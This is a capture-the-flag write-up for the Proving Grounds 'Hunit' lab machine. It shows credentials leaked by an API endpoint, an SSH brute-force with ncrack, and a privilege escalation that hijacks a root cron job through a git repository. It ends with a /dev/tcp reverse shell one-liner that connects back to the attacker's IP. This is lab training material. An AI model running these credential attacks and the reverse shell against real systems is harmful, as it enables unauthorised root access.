Security Analyst | Security Researcher | CRTP

Proving grounds Practice: Hunit

Proving grounds Practice - Hunit CTF writeup.

NMAP

PORT      STATE SERVICE     VERSION
8080/tcp  open  http-proxy
12445/tcp open  netbios-ssn Samba smbd 4.6.2
18030/tcp open  http        Apache httpd 2.4.46 ((Unix))
43022/tcp open  ssh         OpenSSH 8.4 (protocol 2.0)

8080/tcp open http-proxy

File Discovery None

Directory Discovery

  • http://192.168.213.125:8080/api/
  • http://192.168.213.125:8080/api/user/

User directory discloses some credentials.

[
  {
    "login": "rjackson",
    "password": "yYJcgYqszv4aGQ",
    "firstname": "Richard",
    "lastname": "Jackson",
    "description": "Editor",
    "id": 1
  },
  {
    "login": "jsanchez",
    "password": "d52cQ1BzyNQycg",
    "firstname": "Jennifer",
    "lastname": "Sanchez",
    "description": "Editor",
    "id": 3
  },
  {
    "login": "dademola",
    "password": "ExplainSlowQuest110",
    "firstname": "Derik",
    "lastname": "Ademola",
    "description": "Admin",
    "id": 6
  },
  {
    "login": "jwinters",
    "password": "KTuGcSW6Zxwd0Q",
    "firstname": "Julie",
    "lastname": "Winters",
    "description": "Editor",
    "id": 7
  },
  {
    "login": "jvargas",
    "password": "OuQ96hcgiM5o9w",
    "firstname": "James",
    "lastname": "Vargas",
    "description": "Editor",
    "id": 10
  }
]

Users

rjackson jsanchez dademola jwinters jvargas

Passwords

yYJcgYqszv4aGQ d52cQ1BzyNQycg ExplainSlowQuest110 KTuGcSW6Zxwd0Q OuQ96hcgiM5o9w

Brute force credentials for SSH

naveenj@hackerspace:|22:22|~/proving_grounds/Hunit/files$ ncrack -vvv ssh://192.168.213.125:43022 -U users -P passwords 

Starting Ncrack 0.7 ( http://ncrack.org ) at 2023-10-23 22:22 EDT

Discovered credentials on ssh://192.168.213.125:43022 'dademola' 'ExplainSlowQuest110'
ssh://192.168.213.125:43022 finished.

Discovered credentials for ssh on 192.168.213.125 43022/tcp:
192.168.213.125 43022/tcp ssh: 'dademola' 'ExplainSlowQuest110'

12445/tcp open netbios-ssn Samba smbd 4.6.2

Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
	Commander       Disk      Dademola Files
	IPC$            IPC       IPC Service (Samba 4.13.2)
Reconnecting with SMB1 for workgroup listing.

43022/tcp open ssh OpenSSH 8.4 (protocol 2.0)

SSH to user using dademola:ExplainSlowQuest110

naveenj@hackerspace:|22:25|~/proving_grounds/Hunit$ ssh -p 43022 dademola@192.168.213.125
dademola@192.168.213.125's password:ExplainSlowQuest110
Last login: Tue Oct 24 02:22:47 2023 from 192.168.45.196
[dademola@hunit ~]$ 

Privilege Escalation

Download linpeas using port 8080 and note that a cron job is running.

root 300 0.0 0.0 3644 2220 ? Ss 02:19 0:00 /usr/bin/crond -n

/var/spool/anacron:
total 20
drwxr-xr-x 2 root root 4096 Nov  6  2020 .
drwxr-xr-x 6 root root 4096 Nov  6  2020 ..
-rw------- 1 root root    9 Feb 16  2023 cron.daily
-rw------- 1 root root    9 Feb 16  2023 cron.monthly
-rw------- 1 root root    9 Feb 16  2023 cron.weekly
*/3 * * * * /root/git-server/backups.sh
*/2 * * * * /root/pull.sh

Cron job

  • Found id_rsa and id_rsa.pub keys for root.

Extended capabilities

[dademola@hunit ~]$ getcap -r / 2> /dev/null
/usr/bin/newgidmap cap_setgid=ep
/usr/bin/newuidmap cap_setuid=ep

Exploring cron

[dademola@hunit etc]$ cat crontab.bak 
*/3 * * * * /root/git-server/backups.sh
*/2 * * * * /root/pull.sh
  • Cron running these 2 scripts every 3 and 2 minutes.
  • Clone the /git-server folder to the /tmp folder for inspection
  • git clone file:///git-server
[dademola@hunit git-server]$ cat backups.sh 
#!/bin/bash
#
#
# # Placeholder
#
[dademola@hunit git-server]$ ls -al
total 8
drwxr-xr-x 3 dademola dademola 120 Oct 24 03:04 .
drwxrwxrwt 5 root     root     120 Oct 24 03:04 ..
drwxr-xr-x 8 dademola dademola 260 Oct 24 03:04 .git
-rw-r--r-- 1 dademola dademola   0 Oct 24 03:04 NEW_CHANGE
-rw-r--r-- 1 dademola dademola  63 Oct 24 03:04 README
-rw-r--r-- 1 dademola dademola  34 Oct 24 03:04 backups.sh

The backups.sh file is a placeholder file.

To gain control over the script, we need to set up our git identity by configuring the user.name and user.email using the commands git config — global user.name “dademola” and git config — global user.email “dademola@hunit.(none)”, respectively.

[dademola@hunit git-server]$ git config --global user.name "dademola"
[dademola@hunit git-server]$ git config --global user.email "dademola@hunit.(none)"

Clone remote git server using git SSH key

naveenj@hackerspace:|23:18|~/proving_grounds/Hunit$ GIT_SSH_COMMAND='ssh -i id_rsa -p 43022' git clone git@192.168.213.125:/git-server

Add reverse shell connection code to the backups.sh file. Configure git in local machine to push the updated code.

naveenj@hackerspace:|23:23|~/proving_grounds/Hunit/git-server$ git config --global user.name "naveenj"
naveenj@hackerspace:|23:23|~/proving_grounds/Hunit/git-server$ git config --global user.email "naveenj@kali.(none)"
naveenj@hackerspace:|23:24|~/proving_grounds/Hunit/git-server$ git add -A
naveenj@hackerspace:|23:24|~/proving_grounds/Hunit/git-server$ git commit -m "exp"
#git push
naveenj@hackerspace:|23:25|~/proving_grounds/Hunit/git-server$ GIT_SSH_COMMAND='ssh -i ../id_rsa -p 43022' git push origin master
Enumerating objects: 5, done.
Counting objects: 100% (5/5), done.
Delta compression using up to 4 threads
Compressing objects: 100% (3/3), done.
Writing objects: 100% (3/3), 326 bytes | 326.00 KiB/s, done.
Total 3 (delta 1), reused 0 (delta 0), pack-reused 0
To 192.168.213.125:/git-server
   b50f4e5..eee611b  master -> master

Ensure the shell is in the /git-server folder.

Reverse shell

sh -i >& /dev/tcp/192.168.45.196/8080 0>&1

Once the cron job running the reverse shell with root privilege will be obtained.

For more updates and insights, follow me on Twitter: @thevillagehacker.